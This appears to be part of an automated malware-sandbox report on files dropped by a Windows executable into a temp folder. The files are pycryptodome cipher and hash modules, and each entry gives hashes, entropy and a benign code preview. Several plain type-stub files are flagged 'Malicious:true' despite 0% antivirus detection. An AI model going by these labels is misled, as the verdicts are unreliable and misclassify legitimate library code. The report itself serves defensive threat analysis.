                                                                                                                                            SHA-256:7C56BB4712F4126ECEEFF12CA3C91390F8319A44DC809A57670829A6CC9AECA6
                                                                                                                                            SHA-512:82E2F5F1BF25436A8AF1DF324E2DF077AC3354A2ED2EA77DD6F2F9652DE19140CC6AC5FEEC06CAAF0E1742D2B3892399752C0A8FF09A61D88DF503737FEBEA79
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.(.............................d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).z..Output Feedback (CFB) mode....OfbMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_ofba..... int OFB_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int OFB_encrypt(void *ofbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int OFB_decrypt(void *ofbState,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_ofb.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):716
                                                                                                                                            Entropy (8bit):4.736539689518066
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBw1+sJal9lvIY3FDXHo2JRyU1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REP+LjT3pHo2NAY4nRNne3yFnR3FneM
                                                                                                                                            MD5:AFB364F0C9ADDDBA29076577257DFC52
                                                                                                                                            SHA1:208940A0B5304122118AD8E33CB8B8AF35228146
                                                                                                                                            SHA-256:C3F9CFE344BE5B88677256A584AC428D271A23B45E856A77165844787980B63F
                                                                                                                                            SHA-512:00A6D68651C4AE8D159E15F6617421322764CBE06307D9E454A96FBEE925F37BB567A2365416B9C2F4A1FE3AD03185750AB65B8B6BD08878446C8368508D45F8
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['OfbMode']....class OfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_openpgp.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6366
                                                                                                                                            Entropy (8bit):5.4439471629916625
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:V8N+Z1+r1IGXmyaFst834mGPUAt834wmp60nxBXGskD+Uv:U+qZR7FU44OU4RpRxEn
                                                                                                                                            MD5:C5C41BC7CBC0571D3FFEC0BFEAABD63D
                                                                                                                                            SHA1:18EBC25E2833FA858DCF458A7413AD45404CA1A0
                                                                                                                                            SHA-256:294A72AA655F44F9AE189ABC901E115D88BB6AABAB078B851804B604B61FFA7D
                                                                                                                                            SHA-512:8B33C06B727D82DCCD99BA01611A35058D805EF5109D9435469412D30EB55DD2313CB55548C0FB25EABE4C19E6409267521EA3E9FB95820BAF6312FF14CC703D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e[.........................J.....d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e...............Z.d...Z.d.S.).z..OpenPGP mode....OpenPgpMode.....)..._copy_bytes)...get_random_bytesc.....................$.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d.S.).r....az...OpenPGP mode... This mode is a variant of CFB, and it is only used in PGP and. OpenPGP_ applications. If in doubt, use another mode... An Initialization Vector (*IV*) is required... Unlike CFB, the *encrypted* IV (not the IV itself) is. transmitted to the receiver... The IV is a random data block. For legacy reasons, two of its bytes are. duplicated to act as a checksum for the correctness of the key, which is now. known to be insecure and is ignored. The encrypted IV is therefore 2 bytes. longer than the clean IV... .. _OpenPGP: http://tools.ietf.org/html/rfc4880.. :undocumented: __init__. c.....................d.....|.j.........|._.........d.|._...........|.j.........|.|.j.........f.d.|.j...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_openpgp.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):576
                                                                                                                                            Entropy (8bit):4.621504702467695
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1Ro8s7REYB6IvIY3FDUCpu8RypqIY3fmIY3fm1Ap/ILFq6R5wnFq6R5j:1RM7C8T3SCpTB3632A9KnReFnRN
                                                                                                                                            MD5:C1EADE4DE0796F8C003DBB655E410274
                                                                                                                                            SHA1:283080AEFA8D7F00772CE108277688D55519EF46
                                                                                                                                            SHA-256:5E1521B1EA98D146374597A94FF5DF82FBE49F7C3DC06F6DB03379E1EA79D7E5
                                                                                                                                            SHA-512:3D2601FFBB3EC84FDEF28FBF4F409CBBF60D220B394D256FD13728EF5F0CC587FC2EDB00C868C10EEF7E0303508949D79DC23F3998E5CE2D4942A2A625BFC676
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Dict....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['OpenPgpMode']....class OpenPgpMode(object):.. block_size: int.. iv: Union[bytes, bytearray, memoryview].. IV: Union[bytes, bytearray, memoryview].. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. iv: Buffer,.. cipher_params: Dict) -> None: ..... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, plaintext: Buffer) -> bytes: .......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\KMAC128.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):936
                                                                                                                                            Entropy (8bit):4.361612751830179
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REV4yNT3bAGJvdgK1WWLB/V0/V1LBGL8otLB/SmLj:h4rvVsMB/V0/VBBc8cB/S8j
                                                                                                                                            MD5:AB6420FC357655A5E7064F63055C551C
                                                                                                                                            SHA1:C936732267AB86FF4C74D262883948A23FAF2819
                                                                                                                                            SHA-256:383B57B62578122CD924BFA4DCB324233ED0D7A847F89D16BDBD3ED8251240C2
                                                                                                                                            SHA-512:EA97C574488210232741126FD97BAC54241937444DAAB8060C6DB1B5965B1D61EDB17643C4B6076E4DEBEA1B8BD15C3285728637944C2352F9E822CF85E4AF36
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union..from types import ModuleType....Buffer = Union[bytes, bytearray, memoryview]....class KMAC_Hash(object):.... def __init__(self,.. data: Buffer,.. key: Buffer,.. mac_len: int,.. custom: Buffer,.. oid_variant: str,.. cshake: ModuleType,.. rate: int) -> None: ....... def update(self, data: Buffer) -> KMAC_Hash: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ..... def new(self,.. data: Buffer = ...,... mac_len: int = ...,... key: Buffer = ...,.. custom: Buffer = ...) -> KMAC_Hash: .........def new(key: Buffer,.. data: Buffer = ...,... mac_len: int = ...,.. custom: Buffer = ...) -> KMAC_Hash: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\KMAC256.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):236
                                                                                                                                            Entropy (8bit):4.806129043337596
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYB+1LWpVQ9zrIY3MTDyo5LwmLBysOL13yamLs/Ns:1REYBeh9vIY3YyoR3LB/Y3mLs1s
                                                                                                                                            MD5:9BB92F855E03ADD802DAF8AFD8D46DD4
                                                                                                                                            SHA1:2D8211D1408152634446F921611426687A6A8800
                                                                                                                                            SHA-256:B220806E584FF8FA9C4A28733F1A096B631B700096020EADCF766B96F86A82E7
                                                                                                                                            SHA-512:705206605980538F53A763410E8DB18EA03BBA2C204F8FDB2E723EB0EEBD9E1B252414D0EC2E092D46795E82BF61EA126B27CD40EFABC62BF6F0CD039313C43B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union....from .KMAC128 import KMAC_Hash....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. data: Buffer = ...,... mac_len: int = ...,.. custom: Buffer = ...) -> KMAC_Hash: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\MD2.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):511
                                                                                                                                            Entropy (8bit):4.765158993873355
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBjvIY3g2RypRyLu1AwLsQwu5LGLs+4Ls7Ry5Ryn:1REET3g2QEWAwL/0Lz4Lcwy
                                                                                                                                            MD5:4BC02D61022F9C16DF722B5F84952EE6
                                                                                                                                            SHA1:C1AC7927C7F367E0ED86236950DC2966326B127C
                                                                                                                                            SHA-256:3B3C9E78A4313AC9D7935D4AE92C650879BE8F55007478154429919B4794BB42
                                                                                                                                            SHA-512:9A6729A4346430DAB7D125D5575C955B968B2491F37C75F9ECE46A13A0DA794348F86227EC29A0D700CB5B66F76353D4372439D9EE956DFC43CEF75B62EA9251
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class MD4Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD4Hash: ..... def new(self, data: Buffer = ...) -> MD4Hash: .......def new(data: Buffer = ...) -> MD4Hash: .....digest_size: int..block_size: int..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\MD4.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):551
                                                                                                                                            Entropy (8bit):4.846633197285402
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY3g2RypRyLu1AGR4Qwu5LgR4+OR47Ry5Ryn:1REcT3g2QEWAczQ/UYwy
                                                                                                                                            MD5:74AB60EEF22557EA93605E680CA5D294
                                                                                                                                            SHA1:6EE4291D7DB2B6787D18FC27DAD203ED326B3C3C
                                                                                                                                            SHA-256:0602DA2A342D9EF1F7C015F953B2DF27F51C25A5E99F89044E71579662EBA5FF
                                                                                                                                            SHA-512:F87B68B8145984213A2028813A82CD51C294D1A5D723DC92983662E24859EDFF25F5D608C2EC806BB052EC3BA8D8ABAB47C8047347C499FAE16833BB0A6CCC97
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class MD4Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD4Hash: ..... def new(self, data: Optional[Buffer] = ...) -> MD4Hash: .......def new(data: Optional[Buffer] = ...) -> MD4Hash: .....digest_size: int..block_size: int..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\MD5.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7654
                                                                                                                                            Entropy (8bit):5.238544441031523
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:wiCykvVEVo/Ed5X8qln3H4aDJDbqOs6Q1Xhe1ztQDa6zSDB7M7VxxxxxxxxxxxxI:wrEJ3oaVbqAQNhiCDpS
                                                                                                                                            MD5:278E65663DEC597197EF0DD8E6561860
                                                                                                                                            SHA1:C2CBBB283BB49BB0245C0AEDB7389F4AF8E86EAF
                                                                                                                                            SHA-256:BB2B379EB21A3E40E52633A93124265F9A1D6BA019A6E23EFAF66ECE6A055318
                                                                                                                                            SHA-512:8345BD32F5713F9FE78D9D027B01AC58452CE992DBF121A51B11E8F8AE9F6D9739D790247AF468AF1343FA8C50FF9CEE253904EAADA92B2A9EBE4C60A4018F71
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................|.....d.d.l.T.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d.d...Z.d.Z.d.Z.d...Z.d.S.)......)...*)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._MD5a..... #define MD5_DIGEST_SIZE 16.. int MD5_init(void **shaState);. int MD5_destroy(void *shaState);. int MD5_update(void *hs,. const uint8_t *buf,. size_t len);. int MD5_digest(const void *shaState,. uint8_t digest[MD5_DIGEST_SIZE]);. int MD5_copy(const void *src, void *dst);.. int MD5_pbkdf2_hmac_assist(const void *inner,. const void *outer,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\MD5.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):511
                                                                                                                                            Entropy (8bit):4.765158993873355
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBjvIY3IpRypRyLu1AwLsQwu5QlGLsIc4LsIJRy5Ryn:1REET3EQEWAwL/1LQ4Ljwy
                                                                                                                                            MD5:1F1147ECB293220FC948730F06836366
                                                                                                                                            SHA1:E467DEF3A20461383919E11A801E0B57BBDC85E6
                                                                                                                                            SHA-256:8A3E274302454BFF4450C1DF6DA89A048F13EB048E64C6781408F18066F8430B
                                                                                                                                            SHA-512:762332FFC8A79CEFABE74934DEBC2F101EB2BF66584765D21B8A3E21D0483F3AD2A18D60337573121A048588375D225A07F2698616B8227EDFF20FC95528A441
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class MD5Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD5Hash: ..... def new(self, data: Buffer = ...) -> MD5Hash: .......def new(data: Buffer = ...) -> MD5Hash: .....digest_size: int..block_size: int..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\Poly1305.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):689
                                                                                                                                            Entropy (8bit):4.617411626220112
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1Ro8s7REYBjvIY3wzRyaRyLu1Ac08UwEW5RwW0WFWXo84WLBh3Ls/y:1RM7CET32rEWAc0/W1WXo8xLB9LMy
                                                                                                                                            MD5:75346EDCB93D820A434DB03BE87622A5
                                                                                                                                            SHA1:47369DC52B3FAD5BF609908FB1AEACE8D87E2E01
                                                                                                                                            SHA-256:7DA8B1DB291F97F8751EBE26AAFB6663571467C4A13827F8114895990E3DD81A
                                                                                                                                            SHA-512:0F1CA6D6FCC2176B6F8FC7849CF5E14C77109CD92C690B81EC796F204ACADF69F3AD444F674EC3D751CAB4A959232F2BAF6D5E65D4BB174B1C5115A8EF413E1B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from types import ModuleType..from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class Poly1305_MAC(object):.. block_size: int.. digest_size: int.. oid: str.... def __init__(self,.. r : int,.. s : int,.. data : Buffer) -> None: ..... def update(self, data: Buffer) -> Poly1305_MAC: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: .......def new(key: Buffer,.. cipher: ModuleType,.. nonce: Buffer = ...,.. data: Buffer = ...) -> Poly1305_MAC: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\RIPEMD.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):97
                                                                                                                                            Entropy (8bit):4.494398793678958
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:SbFQZmK2lfvo0NEr3Ssov+7Qt/ZTv:SbFsmK2lfWr3SsBktxTv
                                                                                                                                            MD5:37FCCB2128F28CB860905F19A5DE5664
                                                                                                                                            SHA1:E195627D9120B8DF358962BFE57EB1AF121510A7
                                                                                                                                            SHA-256:4E4A85E6BC544386180FAAB57B719D40C8B07D04FF1AD0A222AEDEFD81A29DD4
                                                                                                                                            SHA-512:A33C96C3A508D2C288E34036AD8F5748BC8993BC08D33785E554553E99A7E4818F853593E8D6695F4BA936B528748E96BF2969B616302F3B6AB4DBF7B08EBE6E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# This file exists for backward compatibility with old code that refers to..# Crypto.Hash.SHA....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\RIPEMD160.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):535
                                                                                                                                            Entropy (8bit):4.931502616073856
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBjvIY33hUlRypRyLu1AwLsQwu5TUhGLs7Ug4Ls7UdRy5Ryn:1REET3RWQEWAwL/N/L+14L+ywy
                                                                                                                                            MD5:A9429F32C25E1E86987C94D3EE514342
                                                                                                                                            SHA1:176B307242F24A7BFF87D2A74EE609324AD26550
                                                                                                                                            SHA-256:84F643A25DF20E6A761AD4E1ECDC6F04493DB5CCAF6108254B944A31662A00E7
                                                                                                                                            SHA-512:2A7910E7C1091CC7F9F1D4993EF594F77B2E29841A2B64A702A53BFF6C7231B1224A63A9FC979117614547F699A0EA7864A5C622B083617A1AF316CD51AB1B79
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class RIPEMD160Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> RIPEMD160Hash: ..... def new(self, data: Buffer = ...) -> RIPEMD160Hash: .......def new(data: Buffer = ...) -> RIPEMD160Hash: .....digest_size: int..block_size: int..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\SHA.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):165
                                                                                                                                            Entropy (8bit):4.73872569825065
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:SbFQZmK2lfvo0NEr3Ssov+7Qt/ZTzJmMkt/Z1oQpKGOIWufs/96Lf9:SbFsmK2lfWr3SsBktxTN+tx1xpdhVs/2
                                                                                                                                            MD5:0DE894DECF1A876B03938929070F04E5
                                                                                                                                            SHA1:DCB783EF505138E743F04546FD5A2D6C6A4840FB
                                                                                                                                            SHA-256:0AEA71662B258A56912F1274D95677A727F619A48604D1B1B991891F22ED047D
                                                                                                                                            SHA-512:B2468F52C9C79C44A5BB9CC002E9318FA7C18B60918A85797C21E1A925A23070262A892D864CD1A66F4C14646AC38B8142F2F578D869F453060F58F41C663652
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:# This file exists for backward compatibility with old code that refers to..# Crypto.Hash.SHA....from Crypto.Hash.SHA1 import __doc__, new, block_size, digest_size..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\SHA1.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7701
                                                                                                                                            Entropy (8bit):5.23930686161059
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:vXykvm51RUT7NCbEd5SE2hoqv3HRTTaqbQOs6CELRQDDCzS07BrMZrxxxxxxxxxH:vG51RC7NiE2e6rbQACEWD25Q
                                                                                                                                            MD5:97E564943F44B7A606EFFA102AD25642
                                                                                                                                            SHA1:DA79D40067E122712DE672FC0AAA0F0A1D9B17B2
                                                                                                                                            SHA-256:3659D77A24E368B9F0EED1407FEF342ED8876930D8E5250550FF27079FC85ADC
                                                                                                                                            SHA-512:4EA55579720901C8E120D31FF693326C2BEBE4C031C386CE38EE882B90EB47F03C768B2C39605CBB841D8DF2D68904495F3FFA5164AF0FB83933242D0695D906
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.T.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d.d...Z.e.j.........Z.e.j.........Z.d...Z.d.S.)......)...*)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._SHA1a..... #define SHA1_DIGEST_SIZE 20.. int SHA1_init(void **shaState);. int SHA1_destroy(void *shaState);. int SHA1_update(void *hs,. const uint8_t *buf,. size_t len);. int SHA1_digest(const void *shaState,. uint8_t digest[SHA1_DIGEST_SIZE]);. int SHA1_copy(const void *src, void *dst);.. int SHA1_pbkdf2_hmac_assist(const void *inner,. cons

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\SHA1.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):555
                                                                                                                                            Entropy (8bit):4.858937300843863
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY3vRypRyLu1AGR4Qwu59gR48OR4pRy5Ryn:1REcT3JQEWAczqjUswy
                                                                                                                                            MD5:B35CDD0C45717949B3D05F871CE86E01
                                                                                                                                            SHA1:937CCC519B51BC2AA994CB9F8BD21AAD37865B74
                                                                                                                                            SHA-256:4FC9652243B1B4A443C08C6B22F5C5343C63453405A13FBE9CC9DD12DE6951EA
                                                                                                                                            SHA-512:92E8217DD0C0FA48A33EC261921B5BB6EB385AE47271F2E2E447EFD29279FEE668ECD3A8E910AF34C062CB6CC7CAFE836525CBD93194335F3996FCF78397F69F
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA1Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA1Hash: ..... def new(self, data: Optional[Buffer] = ...) -> SHA1Hash: .......def new(data: Optional[Buffer] = ...) -> SHA1Hash: .....digest_size: int..block_size: int..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\SHA224.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7960
                                                                                                                                            Entropy (8bit):5.2096849025423335
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:W/+ykvlyUR7T4a33Ed53jovF73Hqtfi/FbIOs6xLSZdeFKzOthM9x8jOeXxxxxxF:WKyURf4agKFUfMbIAxuH/FqOowww4
                                                                                                                                            MD5:13DDCF46FFBE67154331BE488B1F83DE
                                                                                                                                            SHA1:688894A0FDE604AA7953FA5C67E1750DCE9D94CB
                                                                                                                                            SHA-256:F076D43C726DAB86F9EEEEC03FFCB2AEB4C4A8402B2713558ED22F2B137567EB
                                                                                                                                            SHA-512:0CA41B0BDB70569DEB936528A0ED216BFD59CFD5554820C9077E121D111B8DFD56673CF712E1F581FF8A3EE2D2F0304E87B56A1B0B7FE4264494823D42D29534
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d.d...Z.e.j.........Z.e.j.........Z.d...Z.d.S.)..........bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._SHA224a..... int SHA224_init(void **shaState);. int SHA224_destroy(void *shaState);. int SHA224_update(void *hs,. const uint8_t *buf,. size_t len);. int SHA224_digest(const void *shaState,. uint8_t *digest,. size_t digest_size);. int SHA224_copy(const void *src, void *dst);.. int SHA224_pbkdf2_hmac_assist(const void *inner,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\SHA224.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):563
                                                                                                                                            Entropy (8bit):4.8974516866478135
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY36RypRyLu1AGR4Qwu5YgR4vOR40Ry5Ryn:1REcT36QEWAczPsUPwy
                                                                                                                                            MD5:F91615062C7CF8B106319B16A210EDD1
                                                                                                                                            SHA1:6BB2CC5E2BB4140E17A3CB821E84FD8408798AEF
                                                                                                                                            SHA-256:A3FBCEE498C3C4CADC8D5136ACED4C69DE9B941802AEA4AEF8C6B272DF1E054A
                                                                                                                                            SHA-512:305B86FDCA88498DC390D013DF6F8ECE0D47A3E79C7E2855D282A8DDE865EE0914643960F04082D52B906EC5DC0603B5403316D87A03A0E0F89178D8D6108497
                                                                                                                                            Malicious:true
